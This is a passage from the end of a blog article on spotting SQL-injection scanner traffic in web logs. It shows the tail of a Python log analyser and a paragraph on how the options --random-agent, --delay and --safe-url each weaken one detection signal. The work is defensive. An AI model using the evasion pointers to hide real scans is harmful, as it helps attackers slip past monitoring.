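                      "peak_per_window": peak, "error_ratio": round(ratio, 3),
                      "flagged": flagged}
    return report


if __name__ == "__main__":
    for ip, summary in analyze(SAMPLE_LOG).items():
        print(ip, summary)
```

The three signals degrade independently: --random-agent removes the User-Agent match, --delay lowers the burst count, and --safe-url dilutes the error ratio, but none of them changes the payload text that reaches the application, which is why the signature count is the weight-bearing signal here and why the other three are best kept as corroboration rather than as the only rule.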
Original article by carmelaweatherly; if reposting, please cite the source: https://blog.ytso.com/274270.html